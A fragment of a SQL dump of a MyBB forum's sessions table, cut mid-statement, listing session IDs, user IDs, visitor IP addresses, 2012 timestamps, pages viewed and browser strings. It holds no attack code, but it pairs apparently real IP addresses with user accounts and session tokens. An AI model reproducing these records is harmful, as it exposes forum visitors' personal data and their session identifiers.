INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('288ff420fc6573ddf2a0bf9878debdf9', '0', '37.177.201.9', '1352757764', '/memberlist.php?', 'Mozilla/5.0 (Linux; U; Android 2.3.4; it-it; GT-S5670 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, l', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a7f8612d53f24fd4778355d81766051f', '0', '173.245.62.11', '1352703476', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1c3a4ca8f7612948d8418d4aa75f651a', '0', '50.23.94.74', '1352823409', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('892c455ee32df208ee280ffe0c47f256', '0', '67.167.176.80', '1352679270', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bd97cefcca33640ee1fc572958339ff0', '0', '7.234.239.6', '1352769592', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ba8ced80467fa0c83f43dc9fa443807', '0', '216.95.115.133', '1352769505', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2a41bf75ee89e8569d0c9d94c9780005', '0', '14.102.66.225', '1352681399', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4dac55a5eb99293476e10d31450c60c2', '340', '94.13.75.42', '1352544963', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('932168c783ce399847e91269667ae538', '0', '18.237.185.251', '1352769583', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a9d9c6a5216319d973abfac4c035a6e3', '0', '209.75.202.184', '1352769583', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fa449872fad4d626daaf6f74ad54af13', '0', '173.245.51.11', '1352744086', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.5 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b527f5b89b0113e5f350cbae1d213950', '341', '197.6.136.191', '1352555731', '/showthread.php?tid=957', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '9', '957'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c38cd29b80c39bb354d5498701e19ac9', '343', '14.194.176.168', '1352609966', '/showthread.php?tid=335', 'Opera/9.80 (J2ME/MIDP; Opera Mini/7.0.29915/28.2957; U; en) Presto/2.8.119 Version/11.10', '0', '0', '25', '335'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f9580997fa0b4298f7770395a401ba88', '0', '229.33.152.20', '1352769582', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ac5150004e07a6a8b738d38051dbf58b', '0', '157.56.93.201', '1352695206', '/showthread.php?tid=824', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '4', '824'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ddbdaaf09fda23ce02358ebce8d105a6', '0', '186.161.22.158', '1352769576', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4a87dddd67901c262b9cfcb5bf471d13', '0', '128.172.75.104', '1352769575', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('545c3707e42382fee55e798d52b75b52', '0', '68.180.236.230', '1352769572', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f497f6a8c3dd0c2e2f426c918a6705ea', '0', '145.162.29.3', '1352769568', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7481c1b717b9c7c60a1019717b2e259b', '0', '45.148.165.246', '1352771740', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ccace1add118d065e05797b6a6f9a48', '0', '213.72.48.11', '1352771223', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42ee2f29e3667771c0366178c94c0819', '0', '199.15.234.60', '1352687441', '/misc.php?action=help&amp;hid=16', 'Opera/9.80 (Windows NT 5.1; U; MRA 5.10 (build 5339); ru) Presto/2.10.229 Version/11.64', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1869093d311ad0499d6f8f3b024ad003', '0', '56.187.210.228', '1352769562', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3b8dd826a46bb7456ae88d81add1f8e9', '342', '96.21.227.16', '1352808846', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('299113d258ffb511ced333ec91e8cc1a', '0', '64.52.114.66', '1352769630', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c50395166105bb2c820bb739997917e7', '4', '173.245.62.14', '1352790493', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f216a3602a0b3a19293b123cd7c2a629', '345', '116.203.56.36', '1352656392', '/showthread.php?tid=1252', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '49', '1252'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0d755af41b3b7830326e6882d85f38a', '0', '113.213.88.248', '1352769561', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b2ef3c0e062f40780726589a14e3f13d', '0', '65.55.24.239', '1352747674', '/showthread.php?tid=896', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '23', '896'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fcfe943c92ab89a00ef9a89303ed04bd', '0', '5.9.40.98', '1352815415', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b3a25d6d74c5a1d5bab03cf651a7793', '0', '233.138.91.165', '1352769561', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('721804fcd75b0595a39bb518b2fee4af', '0', '42.82.28.166', '1352769552', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c33a6432f9670fe086804c8f8411600e', '0', '245.169.81.117', '1352769544', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('39cc7a5a7888ed1adcb28ad8b817da17', '0', '81.57.197.156', '1352769535', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c73119ceaa428f67193bc0a7514279c7', '0', '73.193.141.19', '1352769529', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('54efbd858c9193d2e6c0453b7254ab1f', '0', '117.216.164.11', '1352716328', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7fb9df281373ea6bc85505efa2411bd1', '2', '108.162.240.5', '1352811792', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3101a172210f54ded0065e7fcc672617', '0', '65.55.52.115', '1352819228', '/showthread.php?tid=791', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '7', '791'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d4a4af4843e72499466e8c1a22e427d', '0', '23.58.166.60', '1352769526', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('427ef05ab1b5c834da00ed848b687678', '0', '117.180.112.182', '1352769524', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42f53161c2c90484cda41061096a9ddf', '0', '173.245.52.14', '1352762044', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bd5928829f91e3a04336c64831aeb750', '0', '46.2.196.201', '1352769521', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1a5a9d053a0471d31d91f6edcca561c', '0', '69.164.202.68', '1352703513', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f546378f68e27f12dc3f278f5b737bcc', '257', '203.104.11.11', '1352782857', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0838b149799f3a5323b17b60f2559bf4', '346', '70.174.59.159', '1352809410', '/showthread.php?tid=1258', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like ', '0', '0', '47', '1258'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2779be817536be93f3d41913984e8d8d', '0', '143.2.214.77', '1352681428', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0f0fc58c7db67e13ac2ed8183eacefe9', '0', '52.169.100.228', '1352681455', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('47a317481a4852757c7de656d498f4cc', '0', '63.88.48.193', '1352681483', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dfdc838d5ddb5d81e6b8e34573790edf', '0', '3.76.47.138', '1352681514', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8953f882002febdfb2ebf67eb4562ecd', '0', '198.20.67.66', '1352681981', '/index.php?', '', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2dc8a2a0681647a61e67097b195ceded', '0', '173.245.52.11', '1352754268', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d48138eadd9e57df32ec9f87a9fb008a', '0', '49.248.27.150', '1352816094', '/upgrade.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cf5353328c1c79ed240716501cf676b4', '0', '108.174.155.10', '1352710640', '/index.php?', 'SiteCheck - http://downforeveryoneorjustme.com', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dc83db58f40af31bf5d8d7731377ae4d', '0', '74.125.183.27', '1352687603', '/index.php?', 'AppEngine-Google; (+http://code.google.com/appengine; appid: downforeveryoneorjustme)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7717ab19221d1e10fe4e031df4f3ebdd', '0', '74.91.117.201', '1352686091', '/index.php?', '', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a93a6b6332e4e585ebc310efc82cb91', '0', '50.14.114.81', '1352686502', '/index.php?', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2763f9a2be5523ab9895dfea1a5c5741', '0', '24.9.159.6', '1352686252', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e017aebabc92d584a51b1f4af3dc18e', '0', '72.241.225.135', '1352686231', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7a681e9b2e4234f8be9bb193c65fa19e', '0', '192.200.145.158', '1352688101', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c306c142183022bec65bda92563140b', '0', '173.245.50.14', '1352686246', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c26714ee5f54bb6068909bb834f855c', '0', '173.245.55.11', '1352686398', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cc765f16e1a38b287f2a0aa308495574', '0', '74.125.182.20', '1352686385', '/index.php?', 'AppEngine-Google; (+http://code.google.com/appengine; appid: downforeveryoneorjustme)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f2c10bfb1f5ba35cae063eec7618f232', '0', '65.55.55.230', '1352762467', '/showthread.php?tid=123', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '14', '123'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6360bf9a1208c51d12cbad54e61403ee', '0', '157.55.33.20', '1352724984', '/forumdisplay.php?fid=63', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '63', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('975c0e7968e51c093e56d44de9a43c70', '0', '157.55.33.40', '1352723325', '/showthread.php?tid=1187', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '7', '1187'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('40244cba24c9564e4a01546e1660c19a', '0', '99.240.26.178', '1352692016', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4a8f312587f7a91b3a8dd562cdc6d0a8', '0', '108.162.240.5', '1352692024', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8fd130bac7a987c02008d37c5b77233f', '0', '174.54.231.99', '1352707986', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c589cbda78caf2baf8f3679144d9ea9f', '0', '173.245.56.14', '1352708119', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('33ddeb3930255e051c8c9eda16b70e2c', '0', '157.55.33.253', '1352764549', '/showthread.php?tid=717', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '12', '717'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46d1e1d22640d663bc39ac74edf219c4', '0', '74.125.183.24', '1352717068', '/index.php?', 'AppEngine-Google; (+http://code.google.com/appengine; appid: downforeveryoneorjustme)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c5626e4d9960adae8bd46b55dd7bc6ea', '0', '91.236.74.177', '1352717807', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.46 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aaf2b008178aadfe59f314453b3a7659', '0', '58.111.133.131', '1352720292', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1d9a4bb4b0e6e949f3444895000b4012', '0', '178.40.202.187', '1352726264', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.5 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d0151c4b2dddc663ff429fc2dd45912f', '0', '209.73.132.182', '1352727022', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1df8d31753afebd6ec2632bf16aada68', '0', '69.164.209.129', '1352728990', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3187f2807330107c6ceba28dda43e5bf', '0', '83.82.49.39', '1352753230', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d6bd55514aa082a2bc2efac2534c4023', '0', 